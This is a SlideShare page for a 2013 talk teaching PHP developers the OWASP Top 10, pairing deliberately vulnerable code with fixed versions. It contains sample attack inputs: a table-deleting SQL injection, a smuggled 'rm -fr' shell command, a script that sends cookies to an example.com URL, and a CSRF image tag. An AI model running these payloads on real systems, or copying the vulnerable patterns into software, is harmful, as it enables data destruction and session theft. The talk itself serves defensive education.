Downloaded 190 times
![1999 - 2013 DRI. Some Rights Reserved
.
10
A1 – Injection Examples - SQL
<?php
// prune to sql injection
// script.php?start_record=20
$db = new PDO('mysql:host=localhost;dbname=testdb',
'username',
'password');
$stmt = $db->query(
"SELECT * FROM some_table limit "
. $_REQUEST['start_record']
. ",10");
$result = $stmt->fetchAll(PDO::FETCH_ASSOC);
echo function_to_render_result($result);
// what if I set record = "1; delete from some_table; -- "
<?php
// script.php?start_record=20
$db = new PDO('mysql:host=localhost;dbname=testdb',
'username',
'password');
$stmt = $db->prepare("SELECT * FROM some_table limit ?,10");
$stmt->execute(array($_REQUEST['start_record']));
$result = $stmt->fetchAll(PDO::FETCH_ASSOC);
echo function_to_render_result($result);](https://image.slidesharecdn.com/phplxowasptop10-130912084334-phpapp02/85/OWASP-TOP-10-for-PHP-Programmers-10-320.jpg)
![1999 - 2013 DRI. Some Rights Reserved
.
11
A1 - Injection Samples - OS
<?php
// script.php?file=xpto.pdf
$fileType = exec( "file " . $_REQUEST['file']);
echo $fileType;
// but one can try with "xpto.pdf; rm -fr /some/folder"
<?php
// script.php?file=xpto.pdf
$fileType = exec( "file " . escapeshellarg($_REQUEST['file']));
echo $fileType;](https://image.slidesharecdn.com/phplxowasptop10-130912084334-phpapp02/85/OWASP-TOP-10-for-PHP-Programmers-11-320.jpg)
![1999 - 2013 DRI. Some Rights Reserved
.
13
A2 – Session Fixation
<?php
// Prune to session fixation
// [ ... ]
$userDetails = check_credentials($username, $password);
if ( $userDetails !== false ) {
$_SESSION['userIsLoggedin'] = true;
$_SESSION['userInformation'] = $userDetails;
}
// [ ... ]
<?php
// [ ... ]
$userDetails = check_credentials($username, $password);
if ( $userDetails !== false ) {
session_regenerate_id();
$_SESSION['userIsLoggedin'] = true;
$_SESSION['userInformation'] = $userDetails;
}
// [ ... ]](https://image.slidesharecdn.com/phplxowasptop10-130912084334-phpapp02/85/OWASP-TOP-10-for-PHP-Programmers-13-320.jpg)
![1999 - 2013 DRI. Some Rights Reserved
.
15
A3 – steal user cookie
<?php
// page prune to XSS
// script.php?search=hello
$results = some_search_function($_REQUEST['search']);
?>
<html>
<body>
<p>results for : <?= $_REQUEST['search']; ?>
<?= render_results($results); ?>
</body>
</html>
// set search to:
"<script>document.location='http://www.example.com/precious_cookie
?cookie='+document.cookie</script>"
<?php
// page prune to XSS
// script.php?search=hello
$results = some_search_function($_REQUEST['search']);
?>
<html>
<body>
<p>results for : <?=
htmlentities($_REQUEST['search'],ENT_COMPAT|ENT_HTML401,'UTF-8'); ?>
<?= render_results($results); ?>
</body>
</html>](https://image.slidesharecdn.com/phplxowasptop10-130912084334-phpapp02/85/OWASP-TOP-10-for-PHP-Programmers-15-320.jpg)
![1999 - 2013 DRI. Some Rights Reserved
.
17
A4 – Access other user account
<?php
// prune to insecure direct reference
// script.php?account=10
$accountId = intval($_REQUEST['account']);
$account = new Account($accountId);
echo render_account_info($account);
// and if I change account to "9" ?
<?php
// script.php?account=10
$user = new User($_SESSION['userInfo']);
$accountId = intval($_REQUEST['account']);
$account = new Account($accountId);
if ( $account->canRead($user)) {
echo render_account_info($account);
} else {
echo "Access denied";
}](https://image.slidesharecdn.com/phplxowasptop10-130912084334-phpapp02/85/OWASP-TOP-10-for-PHP-Programmers-17-320.jpg)
![1999 - 2013 DRI. Some Rights Reserved
.
21
A7 – insecure function
<?php
// prune to insecure function access
// script.php?user=john&action=read
$userId = $_REQUEST['user'];
$action = $_REQUEST['action'];
$user = new User($userId);
switch($action) {
case 'read':
echo render_user($user);
break;
case 'delete':
$user->delete();
echo "user Deleted";
break;
}
// and if I change action to "delete"?
<?php
$userId = $_REQUEST['user'];
$action = $_REQUEST['action'];
$loggedUser = new AppUser($_SESSION['userInfo']);
$user = new User($userId);
switch($action) {
case 'read':
if ( $user->canRead($loggedUser) ){
echo render_user($user);
}
break;
case 'delete':
if ( $user->canDelete($loggedUser) ){
$user->delete();
echo "user Deleted";
}
break;
}](https://image.slidesharecdn.com/phplxowasptop10-130912084334-phpapp02/85/OWASP-TOP-10-for-PHP-Programmers-21-320.jpg)
![1999 - 2013 DRI. Some Rights Reserved
.
23
A8 – delete user
<?php
// vulnerable app
// delete.php?id=123
$id = intval($_REQUEST['id']);
$user = new User($id);
$loggedUser = new AppUser($_SESSION['userInfo']);
if ( $user->canDelete($loggedUser) ){
$user->delete();
}
?>
// attackers site:
<img src="http://www.example.com/users/delete.php?id=123" />
<?php
// vulnerable app
$id = intval($_REQUEST['id']);
$user = new User($id);
$loggedUser = new AppUser($_SESSION['userInfo']);
if (validate_token($_REQUEST['token'])) {
if ( $user->canDelete($loggedUser) ){
$user->delete();
}
}](https://image.slidesharecdn.com/phplxowasptop10-130912084334-phpapp02/85/OWASP-TOP-10-for-PHP-Programmers-23-320.jpg)
![1999 - 2013 DRI. Some Rights Reserved
.
26
A10 – “simple” Forward
<?php
class someController extends baseController {
public function preFunction($args,$action)
{
$this->checkAccess($args, $action);
}
public function indexAction($args)
{
// [...] do something here
if ( $args['callback'] && method_exists($this,$args['callback'])){
unset($args['callback']);
call_user_func_array(array($this,$args['callback']),$args);
}
return $response;
}
public function destroyAction($args)
{
$this->selfTerminate();
}
}
if ( $args['callback'] && method_exists($this,$args['callback'])){
$this->preFunction($args,$args['callback']);
unset($args['callback']);
call_user_func_array(array($this,$args['callback']),$args);
}](https://image.slidesharecdn.com/phplxowasptop10-130912084334-phpapp02/85/OWASP-TOP-10-for-PHP-Programmers-26-320.jpg)
Uploaded byrjsmelo
OWASP TOP 10 for PHP Programmers
The document outlines the OWASP Top 10 web application security risks as presented by Ricardo Melo for PHP programmers. It details each risk, including injection flaws, broken authentication, and cross-site scripting, among others, while emphasizing the importance of secure coding practices and continuous application security. The presentation concludes by recommending resources for further learning and stressing that avoiding these risks is a critical step towards application security.
More Related Content
Similar to OWASP TOP 10 for PHP Programmers
OWASP TOP 10 for PHP Programmers
- 1. Follow this topic: @rjsmelo,#owasp, #php, #appsec OWASP TOP 10 for PHP programmers RICARDO MELO Presented at #PHPLX – 11 September 2013
- 2. @rjsmelo 2 RICARDO MELO ●CTO @ DRI ● PHP, Mysql, Linux and lots of other OSS ● ZCE, RHCE, LPI 3, ITIL, etc ● +10 years building (and breaking) things
- 3. @rjsmelo 3 About ● 14Year old academic spin-off ● Pragmatic OSS Orientation ● PHP, Mysql, SugarCRM, Drupal, JavaScript, Linux, etc. ● Crafters, Integrators ● Always looking for software developers – Yes, right now!
- 4. 1999 - 2013DRI. Some Rights Reserved . 4 Outline ● OWASP ● OWASP TOP 10 ● What's Next ● Conclusions
- 5. 1999 - 2013DRI. Some Rights Reserved . 5 What is OWASP? ● Open Web Application Security Project ● World wide non-for-profit ● Focus on security improvement and awareness ● Very active community ● Lots of projects (you can start yours)
- 6. 1999 - 2013DRI. Some Rights Reserved . 6 What is OWASP TOP 10 ● The name is “The Top 10 Most Critical Web Application Risks” ● The focus is awareness ● Released 2003, 2004, 2007, 2010 and 2013 https://www.owasp.org/index.php/Top_10_2013
- 7. 1999 - 2013DRI. Some Rights Reserved . 7 Risk ? Thread Agent Attack Vectors Weakness Prevalence Weakness Detectability Technical Impacts Business Impacts Application Specific EASY WIDESPREAD EASY SEVERE Application / Business Specific AVERAGE COMMON AVERAGE MODERATE DIFFICULT UNCOMMON DIFFICULT MINOR
- 8. 1999 - 2013DRI. Some Rights Reserved . 8 OWASP TOP 10 - 2013 ● A1 – Injection ● A2 – Broken Authentication and Session Management ● A3 – Cross-site Scripting (XSS) ● A4 – Insecure Direct Object References ● A5 – Security Misconfiguration ● A6 – Sensitive Data Exposure ● A7 – Missing Function Level Access Control ● A8 – Cross Site Request Forgery (CSRF) ● A9 – Using Components with Known Vulnerabilities ● A10 – Unvalidated Redirects and Forwards
- 9. 1999 - 2013DRI. Some Rights Reserved . 9 A1 - Injection ● Occurs when untrusted data is sent directly to the interpreter! ● Not only SQL: NoSQL, Ldap, OS, XML, Xpath! ● Never, NEVER trust ANY input!
- 10. 1999 - 2013DRI. Some Rights Reserved . 10 A1 – Injection Examples - SQL <?php // prune to sql injection // script.php?start_record=20 $db = new PDO('mysql:host=localhost;dbname=testdb', 'username', 'password'); $stmt = $db->query( "SELECT * FROM some_table limit " . $_REQUEST['start_record'] . ",10"); $result = $stmt->fetchAll(PDO::FETCH_ASSOC); echo function_to_render_result($result); // what if I set record = "1; delete from some_table; -- " <?php // script.php?start_record=20 $db = new PDO('mysql:host=localhost;dbname=testdb', 'username', 'password'); $stmt = $db->prepare("SELECT * FROM some_table limit ?,10"); $stmt->execute(array($_REQUEST['start_record'])); $result = $stmt->fetchAll(PDO::FETCH_ASSOC); echo function_to_render_result($result);
- 11. 1999 - 2013DRI. Some Rights Reserved . 11 A1 - Injection Samples - OS <?php // script.php?file=xpto.pdf $fileType = exec( "file " . $_REQUEST['file']); echo $fileType; // but one can try with "xpto.pdf; rm -fr /some/folder" <?php // script.php?file=xpto.pdf $fileType = exec( "file " . escapeshellarg($_REQUEST['file'])); echo $fileType;
- 12. 1999 - 2013DRI. Some Rights Reserved . 12 A2 – Broken Authentication and Session Management ● Broken implementations allowing attacker to assume “other” user's identity! ● Can be session hijack/fixation ● Broken authentication ● Or other fails that lead to compromise passwords / keys / session tokens
- 13. 1999 - 2013DRI. Some Rights Reserved . 13 A2 – Session Fixation <?php // Prune to session fixation // [ ... ] $userDetails = check_credentials($username, $password); if ( $userDetails !== false ) { $_SESSION['userIsLoggedin'] = true; $_SESSION['userInformation'] = $userDetails; } // [ ... ] <?php // [ ... ] $userDetails = check_credentials($username, $password); if ( $userDetails !== false ) { session_regenerate_id(); $_SESSION['userIsLoggedin'] = true; $_SESSION['userInformation'] = $userDetails; } // [ ... ]
- 14. 1999 - 2013DRI. Some Rights Reserved . 14 A3 – Cross-Site Scripting (XSS) ● Whenever untrusted data is sent to the browser without proper validation and escaping! ● XSS allows the attacker to OWN the victims browser and do ... everything! ● Stored, Reflected and DOM based XSS
- 15. 1999 - 2013DRI. Some Rights Reserved . 15 A3 – steal user cookie <?php // page prune to XSS // script.php?search=hello $results = some_search_function($_REQUEST['search']); ?> <html> <body> <p>results for : <?= $_REQUEST['search']; ?> <?= render_results($results); ?> </body> </html> // set search to: "<script>document.location='http://www.example.com/precious_cookie ?cookie='+document.cookie</script>" <?php // page prune to XSS // script.php?search=hello $results = some_search_function($_REQUEST['search']); ?> <html> <body> <p>results for : <?= htmlentities($_REQUEST['search'],ENT_COMPAT|ENT_HTML401,'UTF-8'); ?> <?= render_results($results); ?> </body> </html>
- 16. 1999 - 2013DRI. Some Rights Reserved . 16 A4 – Insecure Direct Object Reference ● Whenever developer exposes references to internal objects and don't have proper access control. ● Attackers can change the references and access resources that shouldn't be accessible.
- 17. 1999 - 2013DRI. Some Rights Reserved . 17 A4 – Access other user account <?php // prune to insecure direct reference // script.php?account=10 $accountId = intval($_REQUEST['account']); $account = new Account($accountId); echo render_account_info($account); // and if I change account to "9" ? <?php // script.php?account=10 $user = new User($_SESSION['userInfo']); $accountId = intval($_REQUEST['account']); $account = new Account($accountId); if ( $account->canRead($user)) { echo render_account_info($account); } else { echo "Access denied"; }
- 18. 1999 - 2013DRI. Some Rights Reserved . 18 A5 – Security Misconfiguration ● Often fails in securing the full stack leads to application / servers being compromised. ● Take into consideration other services / applications running in the same infrastructure ● Watch out for outdated software ● Watch out for default accounts
- 19. 1999 - 2013DRI. Some Rights Reserved . 19 A6 – Sensitive Data Exposure ● Whenever sensitive data isn't properly protected allowing attackers to steal or modify that information. ● Credit Card fraud, Identity theft, etc! ● Be aware, data should be protected both in transit or on the storage engine (don't forget the backups)
- 20. 1999 - 2013DRI. Some Rights Reserved . 20 A7 – Missing Function Level Access Control ● Most applications validate function based access control before displaying options in UI, but fail to validate when the function is accessed. ● Attacker can forge request to functions that shouldn't be available
- 21. 1999 - 2013DRI. Some Rights Reserved . 21 A7 – insecure function <?php // prune to insecure function access // script.php?user=john&action=read $userId = $_REQUEST['user']; $action = $_REQUEST['action']; $user = new User($userId); switch($action) { case 'read': echo render_user($user); break; case 'delete': $user->delete(); echo "user Deleted"; break; } // and if I change action to "delete"? <?php $userId = $_REQUEST['user']; $action = $_REQUEST['action']; $loggedUser = new AppUser($_SESSION['userInfo']); $user = new User($userId); switch($action) { case 'read': if ( $user->canRead($loggedUser) ){ echo render_user($user); } break; case 'delete': if ( $user->canDelete($loggedUser) ){ $user->delete(); echo "user Deleted"; } break; }
- 22. 1999 - 2013DRI. Some Rights Reserved . 22 A8 – Cross Site Request Forgery (CSRF) ● CSRF forces a victim's browser to send a forged HTTP request to a vulnerable web application (normally taking advantage of an existing user session) ● No difference from user generated requests!
- 23. 1999 - 2013DRI. Some Rights Reserved . 23 A8 – delete user <?php // vulnerable app // delete.php?id=123 $id = intval($_REQUEST['id']); $user = new User($id); $loggedUser = new AppUser($_SESSION['userInfo']); if ( $user->canDelete($loggedUser) ){ $user->delete(); } ?> // attackers site: <img src="http://www.example.com/users/delete.php?id=123" /> <?php // vulnerable app $id = intval($_REQUEST['id']); $user = new User($id); $loggedUser = new AppUser($_SESSION['userInfo']); if (validate_token($_REQUEST['token'])) { if ( $user->canDelete($loggedUser) ){ $user->delete(); } }
- 24. 1999 - 2013DRI. Some Rights Reserved . 24 A9 – Using Components with know Vulnerabilities ● Whenever you use libraries, frameworks, or other software modules with known vulnerabilities. ● Attackers can leverage this issues to attack your application / server / etc.
- 25. 1999 - 2013DRI. Some Rights Reserved . 25 A10 – Unvalidated Redirects and Forwards ● Web application often redirects users to other pages, using untrusted data to determine the destination pages. ● Atackers can redirect victims to phishing or malware pages or use forwards to access unauthorized pages.
- 26. 1999 - 2013DRI. Some Rights Reserved . 26 A10 – “simple” Forward <?php class someController extends baseController { public function preFunction($args,$action) { $this->checkAccess($args, $action); } public function indexAction($args) { // [...] do something here if ( $args['callback'] && method_exists($this,$args['callback'])){ unset($args['callback']); call_user_func_array(array($this,$args['callback']),$args); } return $response; } public function destroyAction($args) { $this->selfTerminate(); } } if ( $args['callback'] && method_exists($this,$args['callback'])){ $this->preFunction($args,$args['callback']); unset($args['callback']); call_user_func_array(array($this,$args['callback']),$args); }
- 27. 1999 - 2013DRI. Some Rights Reserved . 27 What's Next For PHP Programmers ● OWASP – http://goo.gl/lVRRY ● Cheat Sheets – http://goo.gl/lVRRY ● OWASP Zed Attack Proxy – http://goo.gl/QE5v1H ● OWASP Books – free – http://goo.gl/aLx1q2
- 28. 1999 - 2013DRI. Some Rights Reserved . 28 Conclusions ● Keep the application secure is a continuous process ● Avoiding the TOP 10 Risks don't make your application secure, but is already a HUGE step forward. ● Don't trust ANY input! Escape every output!
- 29.
- 30. Follow this topic: @rjsmelo,#owasp, #php, #appsec QA Feedback: https://joind.in/9107
- 31.